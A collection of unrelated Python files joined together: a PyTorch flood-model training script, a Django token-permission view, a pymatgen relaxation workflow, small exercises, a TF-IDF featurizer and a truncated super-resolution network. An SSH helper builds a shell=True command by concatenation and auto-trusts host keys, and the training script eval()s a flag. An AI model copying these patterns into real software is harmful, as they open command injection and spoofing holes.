from models import swe_model
from utils import optimization
_get_dtype = {'float32': torch.float32,
'float16': torch.float16,
'float64': torch.float64}
FLAGS = flags.FLAGS
flags.DEFINE_string('comment', '',
'Comment for run. Ignored of log_dir is provided')
flags.DEFINE_string('device', 'cuda', 'Device to use.')
flags.DEFINE_string('dtype', 'float32',
f'Data type to use. {_get_dtype.keys()}')
flags.DEFINE_enum('model', 'detour', ['detour'], 'Down sample model')
flags.DEFINE_string('model_init', '',
'Path to model weights to be used at initialization.')
flags.DEFINE_boolean('group_norm', False, 'Use groupnorm instead of batchnorm.')
flags.DEFINE_integer('batch_size', 32, 'Batch size.')
flags.DEFINE_integer('epochs', 10, 'Number of epochs.')
flags.DEFINE_float('lr', 0.001, 'Learning rate.')
flags.DEFINE_string('lr_milestones', '[]',
'Decays the learning rate by gamma once the number of epoch'
' reaches one of the milestones.')
flags.DEFINE_float('lr_gamma', 0.1,
'Multiplicative factor of learning rate decay. Used with'
' milestones.')
flags.DEFINE_float('momentum', 0.9, 'Momentum.')
flags.DEFINE_float('weight_decay', 0.0, 'Weight decay.')
flags.DEFINE_float('regularization_lambda', 0.0, 'Regularization lambda.')
flags.DEFINE_boolean('debug', False, 'Produces debugging output.')
flags.DEFINE_enum('criterion', 'mse', ['mse', 'smooth_l1'], 'Loss function.')
flags.DEFINE_enum('optimizer', 'adam', ['adam', 'sgd'], 'Optimizer.')
flags.DEFINE_enum('regularization', 'smooth_l1', ['mse', 'smooth_l1'],
'Regularization loss function.')
flags.DEFINE_enum('ground_truth_type', 'rain', ['flux', 'rain'],
'Type of ground truth.')
flags.DEFINE_float('alpha', 0.7, 'CFL condition coefficient.')
flags.DEFINE_float('theta', 0.7, 'q centered weighting. [0,1].')
flags.DEFINE_integer('scale_factor', 16,
'Downsample factor from fine to coarse.')
flags.DEFINE_integer('world_size', torch.cuda.device_count(),
'number of distributed processes')
flags.DEFINE_integer('local_rank', -1, 'rank of distributed processes')
flags.DEFINE_string('dist_init', 'env://',
'init used to set up distributed training')
flags.DEFINE_string('dist_backend', 'nccl', 'distributed backend')
_TRAIN_SEED = 214
_TEST_SEED = 123
# Batch size can be larger for test set.
TEST_BATCH_SIZE = 16
def _get_criterion(criterion: str):
return {'mse': nn.MSELoss, 'smooth_l1': nn.SmoothL1Loss,
'inundation': optimization.InundationLoss}[criterion]()
def _get_optimizer(optimizer: str, model: torch.nn.Module, **kwargs):
return {'adam': torch.optim.Adam, 'sgd': torch.optim.SGD}[optimizer](
model.parameters(), **kwargs)
def _flags_to_dict() -> Dict:
names = [x.name for x in FLAGS.get_key_flags_for_module('main.py')]
values = [x.value for x in FLAGS.get_key_flags_for_module('main.py')]
return {name: value for name, value in zip(names, values)}
def _namedtuple_to_json_file(args: NamedTuple, filename: str):
"""Converts namedtuple to readable dict format and saves it as json file."""
args_dict = []
for k, v in args._asdict().items():
if type(v) in {bool, str, int, float}:
args_dict.append({'Name': k, 'Value': v})
elif k == 'optimizer':
value = {'class': type(v).__name__}
for key in sorted(v.param_groups[0].keys()):
if key != 'params':
value[key] = v.param_groups[0][key]
args_dict.append({'Name': k, 'Value': value})
elif k == 'criterion' or k == 'regularization':
args_dict.append({'Name': k, 'Value': type(v).__name__})
with open(filename, 'w') as f:
json.dump(args_dict, f)
def _hyper_parameters(model, coarse_grid_size, coarse_resolution,
train_data) -> NamedTuple:
params = _flags_to_dict()
params['PyTorch'] = torch.__version__
params['dtype'] = _get_dtype[params['dtype']]
params['coarse_dx'] = coarse_resolution
params['coarse_n_x'] = coarse_grid_size
params['fine_dx'] = train_data.resolution
params['boundary_type'] = boundary.BoundaryType[
train_data.boundary_type.upper()]
params['criterion'] = _get_criterion(FLAGS.criterion).to(
FLAGS.device, dtype=_get_dtype[FLAGS.dtype])
params['regularization'] = _get_criterion(FLAGS.regularization).to(
FLAGS.device, dtype=_get_dtype[FLAGS.dtype])
optimizer_params = {'lr': FLAGS.lr, 'weight_decay': FLAGS.weight_decay,
'momentum': FLAGS.momentum}
if FLAGS.optimizer == 'adam':
optimizer_params.pop('momentum')
params['optimizer'] = _get_optimizer(FLAGS.optimizer, model,
**optimizer_params)
params['local_rank'] = FLAGS.local_rank
params['world_size'] = FLAGS.world_size
Args = collections.namedtuple('HyperParameters', sorted(params))
return Args(**params)
def main(_):
if FLAGS.debug:
torch.set_printoptions(precision=5, linewidth=230, sci_mode=False)
torch.manual_seed(_TRAIN_SEED)
torch.cuda.manual_seed(_TRAIN_SEED)
if FLAGS.local_rank >= 0:
dist.init_process_group(backend=FLAGS.dist_backend,
init_method=FLAGS.dist_init,
world_size=FLAGS.world_size,
rank=FLAGS.local_rank)
torch.cuda.set_device(FLAGS.local_rank)
if FLAGS.local_rank <= 0:
FLAGS.alsologtostderr = True
tb.init(FLAGS.log_dir, FLAGS.comment)
logging.get_absl_handler().use_absl_log_file('Logger', tb.get_log_dir())
ground_truth_type = data.GroundTruthType[FLAGS.ground_truth_type.upper()]
train_data = data.USGS(ground_truth_type=ground_truth_type, train_set=True)
test_data = data.USGS(ground_truth_type=ground_truth_type, train_set=False)
if FLAGS.local_rank <= 0:
logging.info(f'USGS-1m loaded with {len(train_data)} train samples, '
f'{len(test_data)} test samples')
if FLAGS.local_rank >= 0:
train_sampler = dist_data.DistributedSampler(train_data,
seed=_TRAIN_SEED)
test_sampler = dist_data.DistributedSampler(test_data, seed=_TEST_SEED,
shuffle=False)
else:
train_sampler = None
test_sampler = None
train_data_loader = torch.utils.data.DataLoader(
train_data, shuffle=(train_sampler is None), sampler=train_sampler,
batch_size=FLAGS.batch_size)
test_data_loader = torch.utils.data.DataLoader(
test_data, shuffle=False, sampler=test_sampler,
batch_size=TEST_BATCH_SIZE)
coarse_grid_size = int(train_data.grid_size // FLAGS.scale_factor)
coarse_resolution = train_data.resolution * FLAGS.scale_factor
solver = saint_venant.SaintVenantFlux(coarse_grid_size, coarse_resolution,
FLAGS.theta)
solver.to_gpu()
if 'detour' in FLAGS.model:
downsample_model = detour.resnet(FLAGS.group_norm)
else:
raise ValueError('Unsupported model type.')
if FLAGS.local_rank <= 0:
logging.info(downsample_model)
model = swe_model.SweModel(downsample_model, solver, coarse_resolution,
coarse_grid_size, FLAGS.alpha)
model = model.cuda()
if bool(FLAGS.model_init):
device = FLAGS.local_rank if FLAGS.local_rank >= 0 else 0
checkpoint = torch.load(FLAGS.model_init,
map_location=torch.device(device))
model.downsample_model.load_state_dict(checkpoint['state_dict'])
if FLAGS.local_rank <= 0:
logging.info('Model initialized with state dict %s',
FLAGS.model_init)
if FLAGS.local_rank >= 0:
device_ids = [FLAGS.local_rank]
model = nn.parallel.DistributedDataParallel(model,
device_ids=device_ids,
output_device=device_ids[0])
FLAGS.lr_milestones = eval(FLAGS.lr_milestones)
args = _hyper_parameters(model, coarse_grid_size, coarse_resolution,
train_data)
if FLAGS.local_rank <= 0:
logging.info(args)
logging.info('Number of model parameters: %s',
sum([p.numel() for p in model.parameters()]))
tb.log_hyper_parameters(args._asdict())
_namedtuple_to_json_file(args, tb.get_log_dir() + '/args.json')
if FLAGS.lr_milestones:
scheduler = torch.optim.lr_scheduler.MultiStepLR(
args.optimizer, FLAGS.lr_milestones, gamma=FLAGS.lr_gamma,
verbose=True if FLAGS.local_rank <= 0 else False)
best_validation_loss = float('inf')
for epoch in range(FLAGS.epochs):
if FLAGS.local_rank >= 0:
train_sampler.set_epoch(epoch)
test_sampler.set_epoch(epoch)
train_loss = trainer.train(epoch, model, train_data_loader, args)
validation_loss = trainer.validate(epoch, model, test_data_loader, args)
if FLAGS.lr_milestones:
scheduler.step()
if FLAGS.local_rank <= 0:
if FLAGS.local_rank < 0:
state_dict = model.downsample_model.state_dict()
else:
state_dict = model.module.downsample_model.state_dict()
torch.save({'epoch': epoch, 'args': args._asdict(),
'state_dict': state_dict},
tb.get_log_dir() + f'/checkpoint.pth')
if validation_loss < best_validation_loss:
best_validation_loss = validation_loss
torch.save({'epoch': epoch, 'args': args._asdict(),
'state_dict': state_dict},
tb.get_log_dir() + f'/best_checkpoint.pth')
logging.info(
f'\nResults - Epoch: {epoch}\tTraining Loss {train_loss:.4f}\t'
f'Validation Loss {validation_loss:.4f}\n')
tb.log_scalars(epoch, write_hparams=True, train_loss=train_loss,
validation_loss=validation_loss)
if __name__ == '__main__':
# CUDA_VISIBLE_DEVICES=0,1,2,3 python -m torch.distributed.launch --nproc_per_node=4 --master_port 29499 main.py --batch_size 1 --debug --epochs 50 --regularization_lambda 0.5
app.run(main)
|
# Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[概要]
トークンページのデータ処理
"""
import sys
import copy
import pytz
import datetime
import hashlib
import json
import traceback
import re
import socket
import urllib.parse
import secrets
import ast
from pytz import timezone
from django.http import HttpResponse, Http404
from django.shortcuts import render,redirect
from django.db.models import Q, Max
from django.db import transaction
from django.views.decorators.http import require_POST
from django.urls import reverse
from django.conf import settings
from libs.commonlibs import define as defs
from libs.commonlibs.common import Common
from libs.commonlibs.oase_logger import OaseLogger
from libs.webcommonlibs.decorator import *
from libs.webcommonlibs.oase_exception import OASEError
from libs.webcommonlibs.common import TimeConversion
from web_app.models.models import TokenInfo, TokenPermission, Group, AccessPermission
from web_app.templatetags.common import get_message
from web_app.serializers.unicode_check import UnicodeCheck
from importlib import import_module
from web_app.views.event.event import SigToken
logger = OaseLogger.get_instance() # ロガー初期化
MENU_ID = 2141001009
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_EVERY)
def index(request):
"""
[メソッド概要]
"""
permission_type = request.user_config.get_menu_auth_type(MENU_ID)
hasUpdateAuthority = True if permission_type == defs.ALLOWED_MENTENANCE else False
token_list = []
token_id_list = []
group_list = []
token_perm_list = []
token_perm = {}
logger.logic_log('LOSI00001', 'None', request=request)
try:
user_groups = request.user_config.group_id_list
token_id_list = TokenPermission.objects.filter(
group_id__in=user_groups, permission_type_id='1').values_list('token_id', flat=True).order_by('token_id')
token = TokenInfo.objects.filter(
token_id__in=token_id_list).order_by('token_id')
group_list = Group.objects.filter(
group_id__in=user_groups).values('group_id', 'group_name').order_by('group_id')
group_info = {}
for group in group_list:
group_info[group['group_id']] = group['group_name']
perm_info = {}
for t in token:
perm_info[t.token_id] = []
for group in group_list:
perm_info[t.token_id].append(
{
'group_id' : group['group_id'],
'group_name' : group_info[group['group_id']],
'permission_type_id' : 0,
}
)
tok_grp_info = {}
TokPerm_list = TokenPermission.objects.filter().values(
'token_id', 'group_id', 'permission_type_id').order_by('token_id')
for tok in TokPerm_list:
tok_id = tok['token_id']
grp_id = tok['group_id']
perm = tok['permission_type_id']
if tok_id not in perm_info or grp_id not in group_info:
continue
tok_grp_info[(tok_id, grp_id)] = perm
for tok_id, v_list in perm_info.items():
for v in v_list:
grp_id = v['group_id']
if (tok_id, grp_id) in tok_grp_info:
v['permission_type_id'] = tok_grp_info[(tok_id, grp_id)]
token_perm_list = perm_info
for t in token:
token_info = {
'token_id' : t.token_id,
'token_name' : t.token_name,
'token_data' : t.token_data,
'use_start_time' : t.use_start_time,
'use_end_time' : t.use_end_time,
'last_update_timestamp' : t.last_update_timestamp,
'last_update_user' : t.last_update_user,
'permission' : token_perm_list[t.token_id] if t.token_id in token_perm_list else []
}
token_list.append(token_info)
except Exception as e:
logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
data = {
'token_list' : token_list,
'hasUpdateAuthority' : hasUpdateAuthority,
'group_list' : group_list,
}
data.update(request.user_config.get_templates_data(request))
logger.logic_log('LOSI00002', 'token_count: %s' % (len(token_list)), request=request)
return render(request,'rule/token.html',data)
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_EVERY)
def delete(request, token_id):
"""
[メソッド概要]
指定されたトークン情報の削除
"""
logger.logic_log('LOSI00001', 'delete token request. token_id=%s' % (token_id), request=request)
response_data = {
'status' : 'success',
'redirect_url' : reverse('web_app:rule:token'),
}
try:
with transaction.atomic():
# ロック
tkn = TokenInfo.objects.select_for_update().get(token_id=token_id)
# 権限チェック
perm_flg = TokenPermission.objects.filter(
token_id = token_id,
group_id__in = request.user_config.group_id_list,
permission_type_id = defs.ALLOWED_MENTENANCE
).exists()
if not perm_flg:
raise OASEError('MOSJA37016', 'LOSI37000', log_params=[token_id, request.user_config.group_id_list])
# トークン情報、トークングループ情報の削除
tkn.delete()
TokenPermission.objects.filter(token_id=token_id).delete()
except TokenInfo.DoesNotExist:
logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
response_data['status'] = 'failure'
response_data['error_msg'] = get_message('MOSJA37017', request.user.get_lang_mode())
except OASEError as e:
if e.log_id:
if e.arg_list and isinstance(e.arg_list, list):
logger.logic_log(e.log_id, *(e.arg_list), request=request)
else:
logger.logic_log(e.log_id, request=request)
if e.msg_id:
if e.arg_dict and isinstance(e.arg_dict, dict):
msg = get_message(e.msg_id, request.user.get_lang_mode(), **(e.arg_dict))
else:
msg = get_message(e.msg_id, request.user.get_lang_mode())
response_data['status'] = 'failure'
response_data['error_msg'] = msg
except Exception as e:
logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
response_data['status'] = 'failure'
response_data['error_msg'] = get_message('MOSJA37015', request.user.get_lang_mode())
logger.logic_log('LOSI00002', 'result:%s, token_id=%s' % (response_data['status'], token_id), request=request)
# 削除成功時はシグナル送信して、トークンをリロード
if response_data['status'] == 'success':
cls = SigToken()
cls.send_sig()
# 応答
response_json = json.dumps(response_data)
return HttpResponse(response_json, content_type="application/json")
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_EVERY)
def update(request, token_id):
"""
[メソッド概要]
指定されたトークン情報の更新
"""
logger.logic_log('LOSI00001', 'update token request. token_id=%s' % (token_id), request=request)
response_data = {
'status' : 'success',
'redirect_url' : reverse('web_app:rule:token'),
}
now = datetime.datetime.now(pytz.timezone('UTC'))
try:
with transaction.atomic():
upd_record = request.POST.get('upd_record', "{}")
upd_record = json.loads(upd_record)
token_info = upd_record['token_info']
# 権限チェック
perm_flg = TokenPermission.objects.filter(
token_id = token_id,
group_id__in = request.user_config.group_id_list,
permission_type_id = defs.ALLOWED_MENTENANCE
).exists()
if not perm_flg:
raise OASEError('MOSJA37028', 'LOSI37001', log_params=[token_id, request.user_config.group_id_list])
# 権限ありのグループ有無チェック
perm_count = 0
for pm in token_info['permission']:
if pm['permission_type_id'] == '1':
perm_count = perm_count + 1
if perm_count < 1:
raise OASEError('MOSJA37046', 'LOSI37007', log_params=['update', token_id])
permission_list_reg = []
for pm in token_info['permission']:
if pm['permission_type_id'] != '0' and pm['permission_type_id'] != '1':
raise OASEError('MOSJA37034', 'LOSI37002', log_params=[token_id, pm['group_id'], pm['permission_type_id']])
rcnt = TokenPermission.objects.filter(
token_id=token_info['token_id'],
group_id=pm['group_id']
).count()
if rcnt > 0:
TokenPermission.objects.filter(
token_id=token_info['token_id'],
group_id=pm['group_id']
).update(
permission_type_id = pm['permission_type_id'],
last_update_timestamp = now,
last_update_user = request.user.user_name
)
else:
permission_list_reg.append(
TokenPermission(
token_id=token_info['token_id'],
group_id = pm['group_id'],
permission_type_id = pm['permission_type_id'],
last_update_timestamp = now,
last_update_user = request.user.user_name
)
)
if len(permission_list_reg) > 0:
TokenPermission.objects.bulk_create(permission_list_reg)
except OASEError as e:
if e.log_id:
if e.arg_list and isinstance(e.arg_list, list):
logger.logic_log(e.log_id, *(e.arg_list), request=request)
else:
logger.logic_log(e.log_id, request=request)
if e.msg_id:
if e.arg_dict and isinstance(e.arg_dict, dict):
msg = get_message(e.msg_id, request.user.get_lang_mode(), **(e.arg_dict))
else:
msg = get_message(e.msg_id, request.user.get_lang_mode())
response_data['status'] = 'failure'
response_data['error_msg'] = msg
except Exception as e:
logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
response_data['status'] = 'failure'
response_data['error_msg'] = get_message('MOSJA37027', request.user.get_lang_mode())
logger.logic_log('LOSI00002', 'result:%s, token_id=%s' % (response_data['status'], token_id), request=request)
response_json = json.dumps(response_data)
return HttpResponse(response_json, content_type="application/json")
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_EVERY)
def display(request):
"""
[メソッド概要]
トークンの再表示
"""
logger.logic_log('LOSI00001', 're-display token request.', request=request)
response_data = {
'status' : 'failure',
'msg' : '',
}
try:
# パラメーター取得
tkn_id = int(request.POST.get('tkn_id', '0'))
passwd = request.POST.get('passwd', '')
passwd = Common.oase_hash(passwd)
# 権限チェック
perm_flg = TokenPermission.objects.filter(
token_id = tkn_id,
group_id__in = request.user_config.group_id_list,
permission_type_id = defs.ALLOWED_MENTENANCE
).exists()
if not perm_flg:
raise OASEError('MOSJA37035', 'LOSI37003', log_params=[tkn_id, request.user_config.group_id_list])
# パラメーターチェック
if passwd != request.user.password:
raise OASEError('MOSJA37036', 'LOSI37004', log_params=[tkn_id, ])
# トークン取得
tkn = TokenInfo.objects.get(token_id=tkn_id).token_data
# 応答データ
response_data['status'] = 'success'
response_data['msg'] = tkn
except TokenInfo.DoesNotExist:
logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
response_data['status'] = 'failure'
response_data['msg'] = get_message('MOSJA37017', request.user.get_lang_mode())
except OASEError as e:
if e.log_id:
if e.arg_list and isinstance(e.arg_list, list):
logger.logic_log(e.log_id, *(e.arg_list), request=request)
else:
logger.logic_log(e.log_id, request=request)
if e.msg_id:
if e.arg_dict and isinstance(e.arg_dict, dict):
msg = get_message(e.msg_id, request.user.get_lang_mode(), **(e.arg_dict))
else:
msg = get_message(e.msg_id, request.user.get_lang_mode())
response_data['status'] = 'failure'
response_data['msg'] = msg
except Exception as e:
logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
response_data['status'] = 'failure'
response_data['msg'] = get_message('MOSJA37037', request.user.get_lang_mode())
logger.logic_log('LOSI00002', 'result:%s, token_id=%s' % (response_data['status'], tkn_id), request=request)
# 応答
response_json = json.dumps(response_data)
return HttpResponse(response_json, content_type="application/json")
@check_allowed_auth(MENU_ID, defs.MENU_CATEGORY.ALLOW_ADMIN)
@require_POST
def create(request):
"""
[メソッド概要]
データ更新処理
POSTリクエストのみ
"""
logger.logic_log('LOSI00001', 'Create New Token', request=request)
response_data = {
'status' : 'success',
'redirect_url' : reverse('web_app:rule:token'),
}
msg = ''
error_msg = {
'token_name' : '',
}
emo_chk = UnicodeCheck()
now = datetime.datetime.now(pytz.timezone('UTC'))
time_zone = settings.TIME_ZONE
# トークン生成
token_value = secrets.token_urlsafe(24)
# 要求パラメーター取得
token_name = request.POST.get('token-name', '')
end_time = request.POST.get('token-end', '')
token_perm = request.POST.get('token-perm', '[]')
token_perm = ast.literal_eval(token_perm)
try:
with transaction.atomic():
# トークン名入力チェック
if len(token_name) == 0:
response_data['status'] = 'failure'
error_msg['token_name'] += get_message('MOSJA37040', request.user.get_lang_mode()) + '\n'
# トークン名文字列長チェック
if len(token_name) > 64:
response_data['status'] = 'failure'
error_msg['token_name'] += get_message('MOSJA37043', request.user.get_lang_mode()) + '\n'
# トークン名禁止文字チェック
emo_flag = False
value_list = emo_chk.is_emotion(token_name)
if len(value_list) > 0:
emo_flag = True
response_data['status'] = 'failure'
error_msg['token_name'] += get_message('MOSJA37044', request.user.get_lang_mode()) + '\n'
# トークン名重複チェック
if not emo_flag and TokenInfo.objects.filter(token_name=token_name).exists():
response_data['status'] = 'failure'
error_msg['token_name'] += get_message('MOSJA37045', request.user.get_lang_mode()) + '\n'
# 日時のチェック(有効期限は空欄の場合は期限なし)
if end_time:
end_time = TimeConversion.get_time_conversion_utc(
end_time, time_zone)
else:
end_time = None
if len(error_msg['token_name']) != 0:
raise Exception()
# 権限チェック
permission_list_reg = []
for pm in token_perm:
if pm['permission_type_id'] not in ['0', '1']:
raise OASEError('MOSJA37039', 'LOSI37006', log_params=[pm['group_id'], pm['permission_type_id']])
# DB保存
token_info = TokenInfo(
token_name = token_name,
token_data = token_value,
use_start_time = now,
use_end_time = end_time,
last_update_timestamp = now,
last_update_user = request.user.user_name
)
token_info.save(force_insert=True)
permission_list_reg = []
for pm in token_perm:
permission_list_reg.append(
TokenPermission(
token_id = token_info.token_id,
group_id = pm['group_id'],
permission_type_id = pm['permission_type_id'],
last_update_timestamp = now,
last_update_user = request.user.user_name
)
)
if len(permission_list_reg) > 0:
TokenPermission.objects.bulk_create(permission_list_reg)
response_data['status'] = 'success'
response_data['redirect_url'] = '/oase_web/rule/token'
response_data['token'] = token_value
except OASEError as e:
if e.log_id:
if e.arg_list and isinstance(e.arg_list, list):
logger.logic_log(e.log_id, *(e.arg_list), request=request)
else:
logger.logic_log(e.log_id, request=request)
if e.msg_id:
if e.arg_dict and isinstance(e.arg_dict, dict):
msg = get_message(e.msg_id, request.user.get_lang_mode(), **(e.arg_dict))
else:
msg = get_message(e.msg_id, request.user.get_lang_mode())
response_data['status'] = 'failure'
response_data['msg'] = msg
except Exception as e:
# 異常処理
logger.system_log('LOSI00005', traceback.format_exc(), request=request)
response_data['status'] = 'failure'
response_data['error_msg'] = error_msg
logger.logic_log('LOSI00002', 'status: %s' % (response_data['status']), request=request)
# 作成成功時はシグナル送信して、トークンをリロード
if response_data['status'] == 'success':
cls = SigToken()
cls.send_sig()
response_json = json.dumps(response_data)
return HttpResponse(response_json, content_type="application/json")
|
#!/usr/bin/env python
import numpy
import os
import logging
import re
import itertools
import matplotlib.pyplot as plt
from pymatgen.io.abinitio.works import RelaxWork
from pymatgen.io.abinitio.tasks import TaskManager
from pymatgen.io.abinitio.flows import Flow
from pymatgen.io.abinitio.strategies import RelaxStrategy
from pymatgen.io.abinitio.abiobjects import KSampling, RelaxationMethod, AbiStructure
from pymatgen.core.units import Energy
from myscripts.pseudos import all_pseudos
from myscripts.structure import HalfHeusler
scratchdir = '/p/lscratchd/damewood'
basename = 'LixMn4Z4'
workdir = os.path.join(scratchdir,basename)
logging.basicConfig()
manager = TaskManager.from_user_config()
acell_opt = {
'N': {
'Li1' : {
'alpha': 4.961,
'beta' : 4.404,
'gamma': 4.996,
},
'Li2' : {
'alpha': 4.500,
'beta' : 4.500,
'gamma': 4.500,
},
'Li3' : {
'alpha': 4.552,
'beta' : 4.552,
'gamma': 4.552,
},
},
'P': {
'Li1' : {
'alpha': 5.300,
'beta' : 5.422,
'gamma': 5.260,
},
'Li2' : {
'alpha': 5.220,
'beta' : 5.220,
'gamma': 5.220,
},
'Li3' : {
'alpha': 5.502,
'beta' : 5.502,
'gamma': 5.502,
},
},
'Si': {
'Li1' : {
'alpha': 4.894,
'beta' : 5.527,
'gamma': 5.517,
},
'Li2' : {
'alpha': 4.894,
'beta' : 5.527,
'gamma': 5.517,
},
'Li3' : {
'alpha': 5.629,
'beta' : 5.778,
'gamma': 5.788,
},
},
}
ksampling = KSampling(mode='monkhorst',kpts=((8,8,8),), kpt_shifts=((0.5,0.5,0.5),(0.5,0.0,0.0),(0.0,0.5,0.0),(0.0,0.0,0.5)))
relax_ion = RelaxationMethod(ionmov = 2, optcell = 0)
relax_ioncell = RelaxationMethod(ionmov = 2, optcell = 1)
pseudos = all_pseudos()
flows = []
for (Z, i) in itertools.product(['P','N','Si'],range(1,4)):
x = 4 - i
name = u'Li%dMn4%s4' % (x,Z)
print(name)
flow = Flow(manager = manager, workdir = os.path.join(workdir, name))
li = u'Li%d' % x
for (phase) in ["alpha","beta","gamma"]:
structure = HalfHeusler(['Li','Mn',Z], phase, acell_opt[Z][li][phase])
structure.make_supercell([[-1,1,1],[1,-1,1],[1,1,-1]])
structure.remove_sites(list(range(i)))
structure.sort(key=lambda j: j.specie.Z)
assert name == structure.formula.replace(' ','')
spins = numpy.zeros([len(structure),3])
for j,atom in enumerate(structure):
if atom.specie.symbol == 'Li':
spins[j,2] = 1.
if atom.specie.symbol == 'Mn':
spins[j,2] = 3.
ion_input = RelaxStrategy(structure, pseudos, ksampling,
relax_ion, accuracy="high", smearing = "fermi_dirac:0.025 eV",
ecut = 40., pawecutdg = 80., chkprim = 0, tolmxf = 5.e-6,
spinat = spins, restartxf = -2, nband = 60, nstep = 100)
ioncell_input = ion_input.copy()
ioncell_input.relax_algo = relax_ioncell
work = RelaxWork(ion_input, ioncell_input, manager = manager)
flow.register_work(work, workdir = phase)
flow = flow.allocate()
flows.append(flow)
def build_and_pickle_dump():
for flow in flows:
flow.build_and_pickle_dump()
def rapidfire():
for flow in flows:
flow.rapidfire()
def get_status():
for flow in flows:
for work in flow:
for task in work:
try:
task.check_status()
except TypeError:
pass
build_and_pickle_dump()
#a = Flow.pickle_load(flows[0].workdir) |
# print a table of n upto 10 recursively
def print_table(n: int, limit: int) -> None:
if limit == 0:
return 0
print_table(n, limit-1)
print(f"{n} * {limit} = {n*limit}")
if __name__ == "__main__":
print_table(20, 10)
print_table(0, 0)
|
import paramiko
import subprocess
class Precondition(object):
@staticmethod
def put_file(machine_name, user_name, dir_name, filename, data):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(machine_name, username=user_name)
sftp = ssh.open_sftp()
try:
sftp.mkdir(dir_name)
except IOError:
pass
f = sftp.open(dir_name + '/' + filename, 'w')
f.write(data)
f.close()
ssh.close()
@staticmethod
def ssh_to_server(server_name, server_ip, remote_command):
str_server_ip = str(server_ip)
str_server_name = str(server_name)
command = subprocess.Popen(["ssh -T " + str_server_name + '@' + str_server_ip + ' ' + remote_command],
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
result = command.stdout.readlines()
if result == 0:
error = command.stderr.readlines()
print >> command.stderr, "ERROR: %s" % error
else:
print result
|
# Exercício Python 073: Crie uma tupla preenchida com os 20 primeiros colocados da Tabela do Campeonato Brasileiro
# de Futebol, na ordem de colocação. Depois mostre:
# a) Os 5 primeiros times.
# b) Os últimos 4 colocados.
# c) Times em ordem alfabética.
# d) Em que posição está o time da Chapecoense.
brasileirao = ('Atlético', 'Flamengo', 'Corinthians', 'Palmeiras', 'Fluminense', 'America-MG', 'Sao Paulo', 'Grêmio',
'Vasco da Gama', 'Internacional', 'Botafogo', 'Sport', 'Recife', 'Cruzeiro', 'EC Vitoria', 'Santos',
'Chapecoense', 'Atlético-PR', 'Bahia', 'Ceará', 'SC', 'Paraná')
print(f"Os cinco primeiros times do brasileirão são: {brasileirao[0:5]}")
print(f"Os quatro últimos colocados do brasileirão são: {brasileirao[-4:]}")
print(f"Os times em ordem alfabética do brasileirão são: {sorted(brasileirao)}")
print(f"O time da Chapecoense do brasileirão está na posição: {brasileirao.index('Chapecoense')}")
|
import numpy as np
import math
from itertools import chain
from collections import Counter
from project.utils.counting import counts_to_probs
from project.utils.text import strip_junk_tokens
################################################################################
# Binary bag of words featurizer
################################################################################
def compute_TF(all_tokens_dict):
"""
Compute term frequeny per sentence
@returns {str:sentence : {str:word: float:P(word|sentence)}}
"""
return {sentence: counts_to_probs(Counter(strip_junk_tokens(words))) \
for (sentence, words) in all_tokens_dict.items()}
def compute_DF(all_tokens_dict):
"""
Compute document frequency per word
@returns {str:word : int:document-count}
"""
df_counts = Counter() # Number of times a word occurs in all observations
# Tabulate the number of documents each word appears in
for words in all_tokens_dict.values():
for word in set(strip_junk_tokens(words)):
if word not in df_counts:
df_counts[word] = 1
else:
df_counts[word] += 1
return df_counts
def compute_TFIDF(all_tokens_dict):
"""
Computes TDIDF for a given word
@returns {str:word : float:TFIDF-score}
"""
sentences = all_tokens_dict.keys()
TF = compute_TF(all_tokens_dict)
DF = compute_DF(all_tokens_dict)
N = float(len(sentences))
TFIDF = {}
for sentence in sentences:
TFIDF[sentence] = {}
for (word, tf) in TF[sentence].items():
IDF = math.log(N / DF[word])
TFIDF[sentence][word] = tf * IDF
return TFIDF
def build(train_ids, all_tokens_dict):
# Strip all the junk:
corpus = strip_junk_tokens(chain.from_iterable(all_tokens_dict.values()))
# Get all unique words:
unique_words = list(set(corpus))
# Term frequeny probabilities per sentence
TFIDF = compute_TFIDF(all_tokens_dict)
# Unknown token IDF value
UNK = math.log(len(all_tokens_dict))
# Sort in ascending order from A..Z
unique_words.sort()
# Assign an index to each word
word_indices = {k:i for (i,k) in enumerate(unique_words, start=0)}
return (all_tokens_dict, word_indices, TFIDF, UNK)
# observation_ids can be training IDs or test observation IDs
def featureize(F, observation_ids):
(all_tokens_dict, word_indices, TFIDF, UNK) = F
n = len(word_indices)
m = len(observation_ids)
# Observations
X = np.zeros((m,n), dtype=np.float)
for (i,ob_id) in enumerate(observation_ids, start=0):
for token in strip_junk_tokens(all_tokens_dict[ob_id]):
j = word_indices[token]
X[i][j] = TFIDF[ob_id][token]
return X
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class ResBlock(nn.Module):
def __init__(self, input_channel, output_channel, act):
super(ResBlock, self).__init__()
self.conv1 = nn.Conv2d(input_channel, output_channel, 3, 1, 1)
self.bn1 = nn.BatchNorm2d(output_channel)
self.conv2 = nn.Conv2d(output_channel, output_channel, 3, 1, 1)
self.bn2 = nn.BatchNorm2d(output_channel)
self.act = act
def forward(self, x):
output = self.act(self.bn1(self.conv1(x)))
output = self.bn2(self.conv2(output))
output = x + output
return output
class SRNTT(nn.Module):
def __init__(self, n_resblocks, use_weights=False, concat=False):
super(SRNTT, self).__init__()
self.n_resblocks = n_resblocks
self.use_weights = use_weights
self.concat = concat
self.relu = nn.ReLU(inplace=True)
self.tanh = nn.Tanh()
self.content_extractor = self._content_extractor()
